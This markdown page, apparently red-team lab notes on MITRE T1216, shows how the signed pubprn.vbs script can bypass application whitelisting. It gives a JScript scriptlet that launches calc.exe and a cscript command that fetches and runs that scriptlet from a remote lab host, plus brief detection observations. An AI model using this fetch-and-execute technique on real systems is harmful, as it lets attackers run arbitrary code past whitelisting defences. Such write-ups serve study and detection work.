Skip to content

Latest commit

 

History

History
61 lines (44 loc) · 1.4 KB

t1216-signed-script-ce.md

File metadata and controls

61 lines (44 loc) · 1.4 KB
description
Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs

T1216: pubprn.vbs Signed Script Code Execution

Execution

Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:

{% code-tabs %} {% code-tabs-item title="http://192.168.2.71/tools/mitre/proxy-script/proxy.sct" %}

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
	>
</registration>

<script language="JScript">
<![CDATA[
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
]]>
</script>

</scriptlet>

{% endcode-tabs-item %} {% endcode-tabs %}

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

{% endcode-tabs-item %} {% endcode-tabs %}

Observations

Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:

Monitoring commandlines can be useful in detecting the script being abused:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1216" %}